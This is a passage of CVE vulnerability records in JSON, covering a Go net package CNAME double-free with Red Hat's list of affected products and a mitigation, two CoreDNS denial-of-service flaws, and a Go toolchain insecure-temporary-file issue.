"cpe:/a:redhat:service_mesh:3.1::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.2::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3.3::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Service Mesh 3.3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:assisted_installer:2"
],
"defaultStatus": "affected",
"product": "Assisted Installer for Red Hat OpenShift Container Platform 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_builds:1"
],
"defaultStatus": "affected",
"product": "Builds for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:cert_manager:1"
],
"defaultStatus": "affected",
"product": "cert-manager Operator for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_compliance_operator:1"
],
"defaultStatus": "affected",
"product": "Compliance Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:confidential_compute_attestation:1"
],
"defaultStatus": "affected",
"product": "Confidential Compute Attestation",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:cryostat:4"
],
"defaultStatus": "affected",
"product": "Cryostat 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_custom_metrics_autoscaler:2"
],
"defaultStatus": "affected",
"product": "Custom Metric Autoscaler operator for Red Hat Openshift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:deployment_validator_operator"
],
"defaultStatus": "affected",
"product": "Deployment Validation Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:external_secrets_operator:1"
],
"defaultStatus": "affected",
"product": "External Secrets Operator for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:workload_availability_far:0"
],
"defaultStatus": "affected",
"product": "Fence Agents Remediation Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_file_integrity_operator:1"
],
"defaultStatus": "affected",
"product": "File Integrity Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:gatekeeper:3"
],
"defaultStatus": "affected",
"product": "Gatekeeper 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:logging:6"
],
"defaultStatus": "affected",
"product": "Logging Subsystem for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:lvms:4"
],
"defaultStatus": "affected",
"product": "Logical Volume Manager Storage",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:workload_availability_mdr:0"
],
"defaultStatus": "affected",
"product": "Machine Deletion Remediation Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:migration_toolkit_applications:8"
],
"defaultStatus": "affected",
"product": "Migration Toolkit for Applications 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:rhmt:1"
],
"defaultStatus": "affected",
"product": "Migration Toolkit for Containers",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:mirror_registry:1"
],
"defaultStatus": "affected",
"product": "mirror registry for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:mirror_registry:2"
],
"defaultStatus": "affected",
"product": "mirror registry for Red Hat OpenShift 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:multiarch_tuning_operator"
],
"defaultStatus": "affected",
"product": "Multiarch Tuning Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:multicluster_engine"
],
"defaultStatus": "affected",
"product": "Multicluster Engine for Kubernetes",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:multicluster_globalhub"
],
"defaultStatus": "affected",
"product": "Multicluster Global Hub",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:network_observ_optr:1"
],
"defaultStatus": "affected",
"product": "Network Observability Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:workload_availability_nhc:0"
],
"defaultStatus": "affected",
"product": "Node HealthCheck Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_api_data_protection:1"
],
"defaultStatus": "affected",
"product": "OpenShift API for Data Protection",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ocp_tools"
],
"defaultStatus": "affected",
"product": "OpenShift Developer Tools and Services",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_lightspeed"
],
"defaultStatus": "affected",
"product": "OpenShift Lightspeed",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_pipelines:1"
],
"defaultStatus": "affected",
"product": "OpenShift Pipelines",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:serverless:1"
],
"defaultStatus": "affected",
"product": "OpenShift Serverless",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:source_to_image:1"
],
"defaultStatus": "affected",
"product": "OpenShift Source-to-Image (S2I)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_power_monitoring"
],
"defaultStatus": "affected",
"product": "Power monitoring for Red Hat OpenShift",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:acm:2"
],
"defaultStatus": "affected",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:advanced_cluster_security:4"
],
"defaultStatus": "affected",
"product": "Red Hat Advanced Cluster Security 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "affected",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_registry:2"
],
"defaultStatus": "affected",
"product": "Red Hat build of Apicurio Registry 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ceph_storage:5"
],
"defaultStatus": "affected",
"product": "Red Hat Ceph Storage 5",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ceph_storage:6"
],
"defaultStatus": "affected",
"product": "Red Hat Ceph Storage 6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:ceph_storage:9"
],
"defaultStatus": "affected",
"product": "Red Hat Ceph Storage 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:certifications:9"
],
"defaultStatus": "affected",
"product": "Red Hat Certification Program for Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:connectivity_link:1"
],
"defaultStatus": "affected",
"product": "Red Hat Connectivity Link 1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:edge_manager:1"
],
"defaultStatus": "affected",
"product": "Red Hat Edge Manager 1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux_ai:3"
],
"defaultStatus": "affected",
"product": "Red Hat Enterprise Linux AI (RHEL AI) 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:lightspeed_for_runtimes:1"
],
"defaultStatus": "affected",
"product": "Red Hat Lightspeed for Runtimes Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_cluster_manager_cli:1"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Cluster Manager CLI",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift:4"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Container Platform 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_data_foundation:4"
],
"defaultStatus": "affected",
"product": "Red Hat Openshift Data Foundation 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_devspaces:3"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Dev Spaces",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:devworkspace"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Dev Workspaces Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_distributed_tracing:3"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift distributed tracing 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:windows_machine_config"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift for Windows Containers",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_gitops:1"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift GitOps",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_service_on_aws:1"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift on AWS",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:container_native_virtualization:4"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Virtualization 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:16.2"
],
"defaultStatus": "affected",
"product": "Red Hat OpenStack Platform 16.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:17.1"
],
"defaultStatus": "affected",
"product": "Red Hat OpenStack Platform 17.1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openstack:18.0"
],
"defaultStatus": "affected",
"product": "Red Hat OpenStack Platform 18.0",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quay:3"
],
"defaultStatus": "affected",
"product": "Red Hat Quay 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:satellite:6"
],
"defaultStatus": "affected",
"product": "Red Hat Satellite 6",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_interconnect:1"
],
"defaultStatus": "affected",
"product": "Red Hat Service Interconnect 1",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_interconnect:2"
],
"defaultStatus": "affected",
"product": "Red Hat Service Interconnect 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:trusted_artifact_signer:1"
],
"defaultStatus": "affected",
"product": "Red Hat Trusted Artifact Signer",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:webterminal:1"
],
"defaultStatus": "affected",
"product": "Red Hat Web Terminal",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_security_profiles_operator:1"
],
"defaultStatus": "affected",
"product": "Security Profiles Operator",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:stf:1.5"
],
"defaultStatus": "affected",
"product": "Service Telemetry Framework 1.5",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_streams:3"
],
"defaultStatus": "affected",
"product": "streams for Apache Kafka 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:zero_trust_workload_identity_manager:1"
],
"defaultStatus": "affected",
"product": "Zero Trust Workload Identity Manager",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:zero_trust_workload_identity_manager:0"
],
"defaultStatus": "affected",
"product": "Zero Trust Workload Identity Manager - Tech Preview",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:2"
],
"defaultStatus": "unaffected",
"product": "OpenShift Service Mesh 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_mesh:3"
],
"defaultStatus": "unaffected",
"product": "OpenShift Service Mesh 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:red_hat_3scale_amp:2"
],
"defaultStatus": "unaffected",
"product": "Red Hat 3scale API Management Platform 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_clients:2023"
],
"defaultStatus": "unaffected",
"product": "Red Hat AMQ Clients",
"vendor": "Red Hat"
}
],
"datePublic": "2026-05-07T19:41:19.285Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the `net` package of Go (golang), specifically when using the `LookupCNAME` function with the `cgo` DNS resolver. A remote attacker could exploit this by providing a very long Canonical Name (CNAME) response. This can trigger a double-free of C memory, leading to a crash and a Denial of Service (DoS) for the affected application."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1341",
"description": "Multiple Releases of Same Resource or Handle",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-03T12:04:56.809Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-33811"
},
{
"name": "RHBZ#2467822",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467822"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-33811.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:34357"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:34359"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:34364"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:23262"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:23264"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33120"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33123"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33142"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:33150"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:34357: Red Hat Enterprise Linux AppStream (v. 10)"
},
{
"lang": "en",
"value": "RHSA-2026:34359: Red Hat Enterprise Linux AppStream (v. 9)"
},
{
"lang": "en",
"value": "RHSA-2026:34364: Logging Subsystem for Red Hat OpenShift 6.4"
},
{
"lang": "en",
"value": "RHSA-2026:33574: Red Hat Developer Hub 1.9"
},
{
"lang": "en",
"value": "RHSA-2026:23262: Red Hat Hardened Images"
},
{
"lang": "en",
"value": "RHSA-2026:23264: Red Hat Hardened Images"
},
{
"lang": "en",
"value": "RHSA-2026:33120: Red Hat OpenShift Service Mesh 3.0"
},
{
"lang": "en",
"value": "RHSA-2026:33123: Red Hat OpenShift Service Mesh 3.1"
},
{
"lang": "en",
"value": "RHSA-2026:33142: Red Hat OpenShift Service Mesh 3.2"
},
{
"lang": "en",
"value": "RHSA-2026:33150: Red Hat OpenShift Service Mesh 3.3"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-07T20:01:34.913Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-05-07T19:41:19.285Z",
"value": "Made public."
}
],
"title": "net: golang: Go net package: Denial of Service via long CNAME response in LookupCNAME",
"workarounds": [
{
"lang": "en",
"value": "To mitigate this issue, applications can be configured to use the pure Go DNS resolver instead of the `cgo` DNS resolver. This can be achieved by setting the `GODEBUG` environment variable to `netdns=go`. For example, to run a Go application with this mitigation: `GODEBUG=netdns=go /path/to/your/go/application`. This change may require restarting affected applications or services to take effect. Users should verify that this change does not negatively impact DNS resolution for their specific application environment."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "net",
"product": "net",
"programRoutines": [
{
"name": "cgoResSearch"
},
{
"name": "LookupCNAME"
},
{
"name": "Resolver.LookupCNAME"
}
],
"vendor": "Go standard library",
"versions": [
{
"lessThan": "1.25.10",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "1.26.3",
"status": "affected",
"version": "1.26.0-0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "hamayanhamayan"
}
],
"descriptions": [
{
"lang": "en",
"value": "When using LookupCNAME with the cgo DNS resolver, a very long CNAME response can trigger a double-free of C memory and a crash."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-415: Double Free",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T19:41:19.285Z",
"orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"shortName": "Go"
},
"references": [
{
"url": "https://go.dev/issue/78803"
},
{
"url": "https://go.dev/cl/767860"
},
{
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"url": "https://pkg.go.dev/vuln/GO-2026-4981"
}
],
"title": "Crash when handling long CNAME response in net"
}
},
"cveMetadata": {
"assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"assignerShortName": "Go",
"cveId": "CVE-2026-33811",
"datePublished": "2026-05-07T19:41:19.285Z",
"dateReserved": "2026-03-23T20:35:32.814Z",
"dateUpdated": "2026-07-03T12:04:56.809Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68151 (GCVE-0-2025-68151)
Vulnerability from cvelistv5 – Published: 2026-01-08 15:33 – Updated: 2026-01-08 15:50- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-68151",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-08T15:50:16.033988Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-08T15:50:35.397Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003c 1.14.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. Prior to version 1.14.0, multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limits, or message size constraints. Version 1.14.0 contains a patch."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-08T15:33:12.711Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-527x-5wrf-22m2",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-527x-5wrf-22m2"
},
{
"name": "https://github.com/coredns/coredns/pull/7490",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/pull/7490"
},
{
"name": "https://github.com/coredns/coredns/commit/0d8cbb1a6bcb6bc9c1a489865278b8725fa20812",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/commit/0d8cbb1a6bcb6bc9c1a489865278b8725fa20812"
}
],
"source": {
"advisory": "GHSA-527x-5wrf-22m2",
"discovery": "UNKNOWN"
},
"title": "CoreDNS gRPC/HTTPS/HTTP3 servers lack resource limits, enabling DoS via unbounded connections and oversized messages"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-68151",
"datePublished": "2026-01-08T15:33:12.711Z",
"dateReserved": "2025-12-15T20:13:34.486Z",
"dateUpdated": "2026-01-08T15:50:35.397Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-32934 (GCVE-0-2026-32934)
Vulnerability from cvelistv5 – Published: 2026-05-05 19:06 – Updated: 2026-05-06 15:14- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-32934",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-06T15:14:18.362180Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-06T15:14:54.790Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-2wpx-qpw2-g5h5"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003c 1.14.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. In versions prior to 1.14.3, the DNS-over-QUIC (DoQ) server can be driven into unbounded goroutine and memory growth by a remote client that opens many QUIC streams and sends only 1 byte per stream. When the worker pool is full, CoreDNS still spawns a goroutine per accepted stream to wait for a worker token. Additionally, active workers block indefinitely in io.ReadFull() with no per-stream read deadline, allowing an attacker to pin all workers by sending a single byte so the read blocks waiting for the second byte of the DoQ length prefix. This enables an unauthenticated remote attacker to cause memory exhaustion and OOM-kill. This issue has been fixed in version 1.14.3. No known workarounds exist."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T19:06:17.080Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-2wpx-qpw2-g5h5",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-2wpx-qpw2-g5h5"
},
{
"name": "https://github.com/coredns/coredns/releases/tag/v1.14.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
}
],
"source": {
"advisory": "GHSA-2wpx-qpw2-g5h5",
"discovery": "UNKNOWN"
},
"title": "CoreDNS DNS-over-QUIC unbounded goroutine growth leads to denial of service"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-32934",
"datePublished": "2026-05-05T19:06:17.080Z",
"dateReserved": "2026-03-17T00:05:53.282Z",
"dateUpdated": "2026-05-06T15:14:54.790Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-39819 (GCVE-0-2026-39819)
Vulnerability from cvelistv5 – Published: 2026-05-07 19:41 – Updated: 2026-05-08 21:29- CWE-377 - Insecure Temporary File
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Go toolchain | cmd/go |
Affected:
0 , < 1.25.10
(semver)
Affected: 1.26.0-0 , < 1.26.3 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-39819",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-08T16:56:43.015860Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-08T21:29:53.674Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://pkg.go.dev",
"defaultStatus": "unaffected",
"packageName": "cmd/go",
"product": "cmd/go",
"vendor": "Go toolchain",
"versions": [
{
"lessThan": "1.25.10",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"lessThan": "1.26.3",
"status": "affected",
"version": "1.26.0-0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Harshit Gupta (Mr HAX)"
}
],
"descriptions": [
{
"lang": "en",
"value": "The \"go bug\" command writes to two files with predictable names in the system temporary directory (for example, \"/tmp\"). An attacker with access to the temporary directory can create a symlink in one of these names, causing \"go bug\" to overwrite the target of the symlink."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-377: Insecure Temporary File",
"lang": "en"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T19:41:18.849Z",
"orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"shortName": "Go"
},
"references": [
{
"url": "https://go.dev/issue/78584"
},
{
"url": "https://go.dev/cl/763882"
},
{
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"url": "https://pkg.go.dev/vuln/GO-2026-4978"
}
],
"title": "Invoking \"go bug\" follows symlinks in predictable temporary filenames in cmd/go"
}
},
"cveMetadata": {
"assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc",
"assignerShortName": "Go",
"cveId": "CVE-2026-39819",
"datePublished": "2026-05-07T19:41:18.849Z",
"dateReserved": "2026-04-07T18:13:03.526Z",
